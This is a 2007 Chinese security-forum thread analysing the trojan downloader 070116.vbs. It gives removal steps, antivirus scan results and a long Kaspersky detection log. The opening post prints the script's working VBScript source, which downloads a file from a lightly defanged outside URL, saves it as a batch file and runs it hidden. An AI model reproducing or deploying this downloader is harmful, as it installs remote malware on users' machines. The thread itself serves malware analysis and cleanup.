收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 关于070116.vbs(Trojan-Downloader.JS.gen)
12下一页
返回列表 发新帖
查看: 6713|回复: 12
收起左侧

关于070116.vbs(Trojan-Downloader.JS.gen)

[复制链接]
teyqiu
发表于 2007-2-28 18:40:02 | 显示全部楼层 |阅读模式
解决方案用强制删除工具 PowerRMV 下载地址: http://post.baidu.com/f?kz=158203765
分别填入下面的文件(包括完整的路径) ,勾选“抑止杀灭对象再次生成”,点杀灭 【有找不到提示的请忽略错误继续】
C:\WINDOWS\070116.vbs
C:\WINDOWS\addins\wmi.bat
C:\WINDOWS\addins\main.vbs
C:\WINDOWS\addins\wmi.vbs
C:\WINDOWS\addins\svchost.exe
C:\WINDOWS\addins\Result.txt

重启计算机

~~~~~~~~~~最新的卡巴斯基病毒库可查杀
案例:
070116.vbs内容:
  1. Set Post=CreateObject("Msxml2.XMLHTTP")
  2. Set Shell=CreateObject("Wscript.Shell")
  3. Post.Open "GET","hxxp://zwz2007.199.hezu1.com/bat.jpg",0
  4. Post.Send()
  5. Set aGet=CreateObject("ADODB.Stream")
  6. aGet.Mode=3
  7. aGet.Type=1
  8. aGet.Open()
  9. aGet.Write(Post.responseBody)
  10. aGet.SaveToFile "C:\WINDOWS\addins\wmi.bat",2
  11. wscript.sleep 10000
  12. Shell.Run ("C:\WINDOWS\addins\wmi.bat setup"),vbhide
复制代码

hxxp://zwz2007.199.hezu1.com/bat.jpg 是其要下载的病毒文件了。。感兴趣的来试试
(hxxp该为 http)

木马程序 Trojan-Downloader.JS.gen (修改) 文件: F:\Documents and Settings\qiu\桌面\临时【样本】\070116.vbs


[ 本帖最后由 teyqiu 于 2007-3-1 20:20 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

The EQs
发表于 2007-2-28 21:30:10 | 显示全部楼层
nod32未报。。。。。
回复

举报

yinxuchina
发表于 2007-2-28 21:48:21 | 显示全部楼层
楼主  密码是多少,不知道 密码 怎么测试
回复

举报

The EQs
发表于 2007-2-28 21:50:38 | 显示全部楼层

回复 #3 yinxuchina 的帖子

virus
回复

举报

jlennon
头像被屏蔽
发表于 2007-2-28 22:41:01 | 显示全部楼层
Virus check with AntiVirusKit
Version 17.0.6282
Virus signatures of 2/24/2007
Start time: 2/28/2007 22:39
Engine(s): Engine A (AVK 17.2920), Engine B (BD 17.2113)
Heuristic: On
Archives: On
System areas: On
Check system areas...
Check selected directories and files...
Object: main.vbs
Path: C:\Documents and Settings\Administrator\桌面\addins\addins
Status: Move file into quarantine
Virus: Backdoor.Win32.Agent.abj (Engine A)
Object: svchost.exe
Path: C:\Documents and Settings\Administrator\桌面\addins\addins
Status: Move file into quarantine
Virus: not-a-virus:NetTool.Win32.TCPScan.b (Engine A), Application.Portscan.EG (Engine B)
Object: wmi.bat
Path: C:\Documents and Settings\Administrator\桌面\addins\addins
Status: Move file into quarantine
Virus: Trojan-Downloader.BAT.TCPScan.a (Engine A), Application.Portscan.EG (Engine B)
Object: wmi.vbs
Path: C:\Documents and Settings\Administrator\桌面\addins\addins
Status: Move file into quarantine
Virus: Backdoor.Win32.Agent.abj (Engine A)
Analysis complete: 2/28/2007 22:39
    5 files checked
    4 infected files detected
    0 suspected files detected
回复

举报

mofunzone
发表于 2007-2-28 23:55:09 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\070116'
C:\Documents and Settings\Administrator\My Documents\070116\
  070116.vbs
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
      [INFO]      The file was moved to '4615a609.qua'!
Begin scan in 'C:\Documents and Settings\Administrator\My Documents\addins'
C:\Documents and Settings\Administrator\My Documents\addins\addins\
  main.vbs
  Result.txt
  svchost.exe
      [DETECTION] Contains signature of the SPR/TCPPortScanne program
      [INFO]      The file was deleted!
  wmi.bat
  wmi.vbs
回复

举报

miss100
发表于 2007-3-1 10:15:55 | 显示全部楼层
addins\addins\svchost.exe        Win32/NetTool.TCPScan.B application        quarantined - deleted
回复

举报

暗夜微岚
发表于 2007-3-2 20:47:02 | 显示全部楼层
LZ除了你说的几个还有几个TXT文档
回复

举报

qqqlyxqqq
发表于 2007-3-3 01:12:49 | 显示全部楼层
LZ说的完全没用 addins这个文件夹里 的确被我全删光的 因为很早卡8就检查出来的
但是 070116 这个文件 不管用 ICE 还是 你说的那个 power 都是无法删彻底~
因为 我就是这样的
回复

举报

qqqlyxqqq
发表于 2007-3-3 01:16:24 | 显示全部楼层
2007-2-27 18:58:48        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 18:58:48        已经检测到安全威胁。建议您立即处理它们。
2007-2-27 18:59:03        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-27 19:20:42        进程  (PID 2440) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 452), 已被自我保护功能阻止。
2007-2-27 19:20:42        进程  (PID 2440) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 1704), 已被自我保护功能阻止。
2007-2-27 19:23:24        恶意 HTTP 对象 <http://pt.cga.com.cn/Yayad4HaoFang070112.exe/data0002>: 已检测 广告程序 not-a-virus:AdWare.Win32.Yayadu.b.
2007-2-27 19:23:24        恶意 HTTP 对象 <http://pt.cga.com.cn/Yayad4HaoFang070112.exe/data0002>: 拒绝访问.
2007-2-27 19:42:49        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 19:42:49        已经检测到安全威胁。建议您立即处理它们。
2007-2-27 19:43:07        文件 C:\WINDOWS\070116.VBS: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 19:54:59        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-27 19:54:59        文件 C:\WINDOWS\070116.VBS 无法被隔离
2007-2-27 19:58:50        隔离: 文件 C:\WINDOWS\070116.VBS: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 21:14:37        更新错误: 无法建立连接.
2007-2-27 21:15:45        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 21:15:45        已经检测到安全威胁。建议您立即处理它们。
2007-2-27 21:15:49        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-27 21:23:50        进程  (PID 3016) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 680), 已被自我保护功能阻止。
2007-2-27 21:23:50        进程  (PID 3016) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 1736), 已被自我保护功能阻止。
2007-2-27 22:07:04        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 22:07:04        已经检测到安全威胁。建议您立即处理它们。
2007-2-27 22:07:10        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-27 22:17:51        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 22:17:51        已经检测到安全威胁。建议您立即处理它们。
2007-2-27 22:17:53        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-27 22:26:19        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 22:26:19        已经检测到安全威胁。建议您立即处理它们。
2007-2-27 22:26:22        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-27 22:29:06        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 22:29:06        已经检测到安全威胁。建议您立即处理它们。
2007-2-27 22:29:07        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-27 22:45:33        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 22:45:33        已经检测到安全威胁。建议您立即处理它们。
2007-2-27 22:45:36        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-27 23:15:15        隔离: 文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 23:15:16        更新成功完成。
2007-2-27 23:32:02        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-27 23:32:02        已经检测到安全威胁。建议您立即处理它们。
2007-2-27 23:32:09        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 0:29:04        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 0:29:04        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 0:29:12        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 0:55:48        运行进程 C:\Documents and Settings\Administrator\s1.exe: 检测到新变种 风险软件 Trojan.generic
2007-2-28 0:55:48        进程 C:\Documents and Settings\Administrator\s1.exe (PID 4004) 成功 终止.
2007-2-28 0:55:49        恢复 非 完成。
2007-2-28 0:58:01        运行进程 C:\Documents and Settings\Administrator\s1.exe: 检测到新变种 风险软件 Trojan.generic
2007-2-28 0:58:05        进程 C:\Documents and Settings\Administrator\s1.exe (PID 3280) 成功 终止.
2007-2-28 1:05:36        运行进程 C:\Documents and Settings\Administrator\setup.exe: 检测到新变种 风险软件 Trojan.generic
2007-2-28 1:05:39        进程 C:\Documents and Settings\Administrator\setup.exe (PID 2204) 成功 终止.
2007-2-28 1:06:02        恢复 成功 完成。
2007-2-28 1:07:10        进程  (PID 3908) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 680), 已被自我保护功能阻止。
2007-2-28 1:07:10        进程  (PID 3908) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 1736), 已被自我保护功能阻止。
2007-2-28 1:17:20        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 1:17:20        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 1:17:23        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 2:15:37        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 2:15:38        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 2:15:42        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-28 2:18:09        进程  (PID 3816) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 1736), 已被自我保护功能阻止。
2007-2-28 2:18:09        进程  (PID 3816) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 680), 已被自我保护功能阻止。
2007-2-28 2:18:22        进程  (PID 1552) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 1736), 已被自我保护功能阻止。
2007-2-28 2:18:22        进程  (PID 1552) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 680), 已被自我保护功能阻止。
2007-2-28 2:49:38        进程  (PID 3744) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 680), 已被自我保护功能阻止。
2007-2-28 2:49:38        进程  (PID 3744) 尝试 访问 卡巴斯基反病毒软件 6.0 进程 (PID 1736), 已被自我保护功能阻止。
2007-2-28 2:59:07        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 2:59:07        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 2:59:11        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 3:15:02        隔离: 文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 3:15:03        更新成功完成。
2007-2-28 3:41:08        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 3:41:08        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 3:41:12        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 13:39:44        更新错误: 无法建立连接.
2007-2-28 13:46:07        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 13:46:07        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 13:46:24        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-28 13:49:37        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 13:49:37        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 13:49:39        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-28 14:05:22        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:05:23        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:05:43        文件 C:\WINDOWS\070116.VBS: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:05:58        文件 C:\WINDOWS\070116.VBS: 删除
2007-2-28 14:05:58        文件 C:\WINDOWS\070116.vbs 无法删除
2007-2-28 14:06:27        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:06:27        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:06:49        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 14:25:35        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:25:35        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:25:42        文件 C:\WINDOWS\070116.vbs 无法删除
2007-2-28 14:25:44        !NOLOC! StatusId(0) EventID(1)
2007-2-28 14:25:44        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:25:46        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 14:27:34        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:27:34        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:27:39        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-28 14:30:38        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:30:38        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:30:47        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-28 14:31:04        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:31:04        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:31:09        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 14:31:48        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:31:48        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:31:54        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 14:37:05        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:37:05        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:37:09        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 14:38:06        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:38:06        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:38:07        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 14:56:39        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 14:56:39        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 14:56:41        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 15:04:03        隔离: 文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 15:05:09        文件 D:\111111111.exe: 检测到 木马程序 Backdoor.Win32.Hupigon.ada
2007-2-28 15:05:09        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 15:05:19        文件 D:\111111111.exe: 删除
2007-2-28 15:07:45        文件 D:\2222.exe: 检测到 木马程序 Backdoor.Win32.Hupigon.ada
2007-2-28 15:07:45        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 15:07:50        文件 D:\2222.exe: 删除
2007-2-28 15:08:03        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 15:08:03        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 15:10:08        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 15:27:29        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 15:27:29        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 15:28:05        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 15:30:01        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 15:30:01        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 15:30:05        文件 C:\WINDOWS\070116.vbs: 未清除, 被用户跳过
2007-2-28 15:33:56        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 15:34:06        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 15:38:36        卡巴斯基反病毒软件 6.0 没有激活。
2007-2-28 15:41:01        更新错误: 无法建立连接.
2007-2-28 15:50:36        文件 C:\2222.exe: 检测到 木马程序 Backdoor.Win32.Hupigon.ada
2007-2-28 15:50:36        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 15:50:42        文件 C:\2222.exe: 删除
2007-2-28 15:50:52        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 15:50:53        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 15:50:55        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 15:51:22        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 15:51:22        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 15:51:26        文件 C:\WINDOWS\070116.vbs: 删除
2007-2-28 15:51:40        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
2007-2-28 15:51:40        已经检测到安全威胁。建议您立即处理它们。
2007-2-28 15:51:43        文件 C:\WINDOWS\070116.vbs: 隔离
2007-2-28 15:52:26        文件 C:\WINDOWS\070116.vbs: 检测到新变种 木马程序 Trojan-Downloader.JS.gen
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-10 15:12 , Processed in 0.127416 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表